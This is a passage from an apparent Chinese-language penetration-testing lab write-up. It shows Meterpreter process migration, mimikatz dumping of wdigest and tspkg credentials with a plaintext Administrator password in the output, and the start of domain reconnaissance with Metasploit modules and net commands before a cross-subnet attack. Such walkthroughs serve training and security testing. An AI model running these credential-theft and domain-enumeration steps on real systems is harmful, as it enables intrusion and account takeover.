<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">meterpreter &gt; getuid</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.35pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Server username: WEB\Administrator</span><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;">
        <a name="_Toc21057"></a><span lang="EN-US">4.3.migrate </span><span><span style="font-family:黑体;font-weight:normal;">迁移进程</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:209.5pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">migrate </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">迁移到<span lang="EN-US">64</span>位进程里<span lang="EN-US"> migrate 592</span>进行到<span lang="EN-US"> system </span>方便我们的操作</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:42.75pt;margin-left:22.8pt;margin-right:-21.4pt;margin-top:0cm;">
        <img width="553" height="89" src="https://www.2k8.org/content/uploadfile/202203/17/a0599b87.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
        <a name="_Toc21058"></a><span lang="EN-US">4.4.mimikatz </span><span><span style="font-family:黑体;font-weight:normal;">哈希明文获取</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:299.65pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">load mimikatz meterpreter &gt; wdigest [+] Running as SYSTEM</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:229.5pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Retrieving wdigest credentials wdigest credentials</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">===================</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 72.35pt 130.45pt 201.0pt 290.9pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">AuthID<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Package<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Domain<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>User<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Password</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 60.9pt 109.2pt 172.2pt 255.1pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">------<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>-------<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>------<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>----<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>--------</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 65.75pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">0;46514<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>NTLM</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 74.15pt 143.4pt 225.6pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">0;997<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Negotiate<span>&nbsp;&nbsp;&nbsp; </span>NT AUTHORITY<span>&nbsp;&nbsp; </span>LOCAL SERVICE</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 66.15pt 127.35pt 227.35pt 298.0pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">0;558301<span>&nbsp;&nbsp;&nbsp; </span>NTLM<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>WEB<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Administrator<span>&nbsp;&nbsp;&nbsp; </span>!@#Qwe456</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 260.85pt right 416.75pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">0;996<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Negotiate<span>&nbsp;&nbsp; </span>HACKBOX</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:right 416.75pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">WEB$<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>@tB]xH/ka*ZmmIFokG1qiX#A#_ucF^NfcV9*ry"o$sfC)qN</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">%SA+]DvRq@htb.=_Mf;g?(N3y$:e5j[h5g#VngdcT'Ku92U TG^$cLzCnSIhw</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 260.85pt right 416.75pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">0;999<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Negotiate<span>&nbsp;&nbsp; </span>HACKBOX</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:right 416.75pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">WEB$<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>@tB]xH/ka*ZmmIFokG1qiX#A#_ucF^NfcV9*ry"o$sfC)qN</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">%SA+]DvRq@htb.=_Mf;g?(N3y$:e5j[h5g#VngdcT'Ku92U TG^$cLzCnSIhw</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:309.1pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">meterpreter &gt; tspkg [+] Running as SYSTEM</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:250.5pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Retrieving tspkg credentials tspkg credentials</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:5.45pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">=================</span><span lang="EN-US"></span>
</p>
<table border="0" cellpadding="0" cellspacing="0" width="435" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;width:326.5pt;" class="ke-zeroborder">
        <tbody>
                <tr style="height:12.9pt;">
                        <td width="62" valign="top" style="width:46.2pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">AuthID</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="191" valign="top" style="width:143.5pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:center 84.25pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">Package<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Domain</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="182" valign="top" style="width:136.8pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:center 101.15pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">User<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>Password</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="62" valign="top" style="width:46.2pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">------</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="191" valign="top" style="width:143.5pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:center 63.0pt right 143.5pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">-------<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>------<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>----</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="182" valign="top" style="width:136.8pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p align="center" style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:6.0pt;margin-top:0cm;text-align:center;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">--------</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="62" valign="top" style="width:46.2pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">0;996</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="191" valign="top" style="width:143.5pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:center 84.85pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">Negotiate<span>&nbsp;&nbsp;&nbsp;&nbsp; </span>HACKBOX</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="182" valign="top" style="width:136.8pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.3pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">WEB$</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="62" valign="top" style="width:46.2pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">0;46514</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="191" valign="top" style="width:143.5pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:5.75pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">NTLM</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="182" valign="top" style="width:136.8pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:8.0pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US">&nbsp;</span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="62" valign="top" style="width:46.2pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">0;997</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="191" valign="top" style="width:143.5pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:right 143.5pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">Negotiate<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>NT AUTHORITY</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="182" valign="top" style="width:136.8pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">LOCAL   SERVICE</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="62" valign="top" style="width:46.2pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">0;999</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="191" valign="top" style="width:143.5pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:center 84.85pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">Negotiate<span>&nbsp;&nbsp;&nbsp;&nbsp; </span>HACKBOX</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="182" valign="top" style="width:136.8pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.3pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">WEB$</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:12.9pt;">
                        <td width="62" valign="top" style="width:46.2pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;text-align:justify;text-justify:inter-ideograph;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">0;558301</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="191" valign="top" style="width:143.5pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:center 81.15pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">NTLM<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>WEB</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="182" valign="top" style="width:136.8pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;tab-stops:right 136.8pt;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">Administrator<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>!@#Qwe456</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
        </tbody>
</table>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:81.1pt;margin-left:-.25pt;margin-right:164.85pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">看到有<span lang="EN-US">hackbox</span>域 用户<span lang="EN-US">web </span>本地管理员<span lang="EN-US">Administrator </span>密码<span lang="EN-US"> !@#Qwe456</span></span><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
        <a name="_Toc21059"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">5.</span></b>跨网段域渗透<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.0pt;margin-left:-.25pt;">
        <a name="_Toc21060"></a><span lang="EN-US">5.1.metasploit </span><span><span style="font-family:黑体;font-weight:normal;">跨网段的域渗透</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.35pt;margin-left:-.25pt;margin-right:95.1pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">这里我将用两个内网渗透神器进行域渗透下的域渗透分别是 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">metasploit </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">和 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">cobalt strike4.0</span><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21061"></a><span lang="EN-US">5.1.1.</span><span><span style="font-family:宋体;font-weight:normal;">确定域环境</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net config workstation</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:40.8pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="345" src="https://www.2k8.org/content/uploadfile/202203/17/1fb9efc3.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21062"></a><span lang="EN-US">5.1.2.</span><span><span style="font-family:宋体;font-weight:normal;">定位域控</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:1.9pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <span lang="EN-US" style="font-family:宋体;font-size:12.0pt;line-height:107%;">run post/windows/gather/enum_domain</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:21.5pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="79" src="https://www.2k8.org/content/uploadfile/202203/17/379dd770.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:3.4pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/gather/enum_ad_computers</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:39.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="77" src="https://www.2k8.org/content/uploadfile/202203/17/dbc8c4bd.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21063"></a><span lang="EN-US">5.1.3.</span><span><span style="font-family:宋体;font-weight:normal;">域信息收集</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:118%;margin-bottom:1.05pt;margin-left:-.25pt;margin-right:267.2pt;margin-top:0cm;text-align:justify;text-indent:-.5pt;text-justify:inter-ideograph;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">net time /domain </span><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">查看域控时间 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">net view </span><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">遍历信任主机 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">net view /domain </span><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">查看域</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net view /domain:hackbox</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:24.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="170" src="https://www.2k8.org/content/uploadfile/202203/17/c1b05b55.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.4pt;margin-left:-.25pt;margin-right:228.65pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">查看域组失败 其他查看组信息均失败 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net group /domain</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
